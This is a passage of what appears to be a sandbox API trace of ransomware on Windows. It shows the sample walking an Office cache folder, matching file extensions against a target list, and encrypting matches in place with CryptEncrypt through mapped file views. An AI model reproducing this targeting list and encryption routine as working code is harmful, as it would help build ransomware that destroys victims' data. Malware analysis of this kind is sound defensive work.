pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="DW20.EXE" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" [0029.491] PathFindExtensionW (pszPath="DW20.EXE") returned=".EXE" [0029.491] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".EXE.") returned 0x0 [0029.491] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.491] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.491] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="dwdcw20.dll" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" [0029.491] PathFindExtensionW (pszPath="dwdcw20.dll") returned=".dll" [0029.491] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".dll.") returned 0x0 [0029.491] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.491] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.491] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="dwtrig20.exe" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" [0029.491] PathFindExtensionW (pszPath="dwtrig20.exe") returned=".exe" [0029.491] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".exe.") returned 0x0 [0029.491] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.491] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.491] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="Microsoft.VC90.CRT.manifest" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" [0029.491] PathFindExtensionW (pszPath="Microsoft.VC90.CRT.manifest") returned=".manifest" [0029.491] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".manifest.") returned 0x0 [0029.492] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.492] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.492] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="msvcr90.dll" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" [0029.492] PathFindExtensionW (pszPath="msvcr90.dll") returned=".dll" [0029.492] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".dll.") returned 0x0 [0029.492] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.492] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.492] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="OfficeLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" [0029.492] PathFindExtensionW (pszPath="OfficeLR.cab") returned=".cab" [0029.492] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0029.492] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0029.492] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0029.492] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=14127746) returned 1 [0029.492] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd792b2, lpName=0x0) returned 0x230 [0029.492] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.492] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xd70000, dwNumberOfBytesToMap=0x9282) returned 0xa0000 [0029.500] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.501] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd79282) returned 0x3240000 [0029.502] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0xd79282, dwBufLen=0xd79290 | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0xd79290) returned 1 [0030.076] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0xd79290) returned 1 [0030.224] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0030.333] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.333] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xd70000, dwNumberOfBytesToMap=0x92b2) returned 0xa0000 [0030.334] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0030.334] CryptHashData (hHash=0x368430, pbData=0xa928c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0030.334] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0030.334] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0030.334] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x92b2) returned 1 [0030.340] LocalFree (hMem=0x36ea40) returned 0x0 [0030.340] CryptDestroyHash (hHash=0x368430) returned 1 [0030.340] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.340] CloseHandle (hObject=0x230) returned 1 [0030.340] CloseHandle (hObject=0x22c) returned 1 [0030.340] CryptDestroyKey (hKey=0x3683b0) returned 1 [0030.340] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.340] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.340] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="OfficeMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" [0030.340] PathFindExtensionW (pszPath="OfficeMUI.msi") returned=".msi" [0030.340] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0030.340] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.340] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.340] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="OfficeMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" [0030.340] PathFindExtensionW (pszPath="OfficeMUI.xml") returned=".xml" [0030.340] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0030.340] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0030.340] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0030.341] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=5557) returned 1 [0030.341] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15e2, lpName=0x0) returned 0x230 [0030.341] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.341] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15b5) returned 0xa0000 [0030.346] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.346] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15b5) returned 0xa0000 [0030.347] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x15b5, dwBufLen=0x15c0 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x15c0) returned 1 [0030.347] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x15c0) returned 1 [0030.387] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.387] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.387] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15e2) returned 0xa0000 [0030.389] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0030.389] CryptHashData (hHash=0x368430, pbData=0xa15bc, dwDataLen=0x4, dwFlags=0x0) returned 1 [0030.389] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0030.389] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0030.389] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x15e2) returned 1 [0030.413] LocalFree (hMem=0x36ea40) returned 0x0 [0030.413] CryptDestroyHash (hHash=0x368430) returned 1 [0030.413] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.413] CloseHandle (hObject=0x230) returned 1 [0030.413] CloseHandle (hObject=0x22c) returned 1 [0030.413] CryptDestroyKey (hKey=0x3683b0) returned 1 [0030.414] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.414] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.414] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="OfficeMUISet.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" [0030.414] PathFindExtensionW (pszPath="OfficeMUISet.msi") returned=".msi" [0030.414] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0030.414] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.414] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.414] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="OfficeMUISet.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" [0030.414] PathFindExtensionW (pszPath="OfficeMUISet.xml") returned=".xml" [0030.414] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0030.414] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0030.414] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0030.414] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=819) returned 1 [0030.414] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x362, lpName=0x0) returned 0x230 [0030.414] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.414] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x333) returned 0xa0000 [0030.470] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.470] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x333) returned 0xa0000 [0030.471] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x333, dwBufLen=0x340 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x340) returned 1 [0030.471] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x340) returned 1 [0030.530] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.530] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.530] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x362) returned 0xa0000 [0030.531] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0030.531] CryptHashData (hHash=0x368430, pbData=0xa033c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0030.531] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0030.531] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0030.531] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x362) returned 1 [0030.575] LocalFree (hMem=0x36ea40) returned 0x0 [0030.575] CryptDestroyHash (hHash=0x368430) returned 1 [0030.575] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.575] CloseHandle (hObject=0x230) returned 1 [0030.575] CloseHandle (hObject=0x22c) returned 1 [0030.575] CryptDestroyKey (hKey=0x3683b0) returned 1 [0030.575] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.575] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.575] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="osetupui.dll" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" [0030.575] PathFindExtensionW (pszPath="osetupui.dll") returned=".dll" [0030.575] StrStrIW 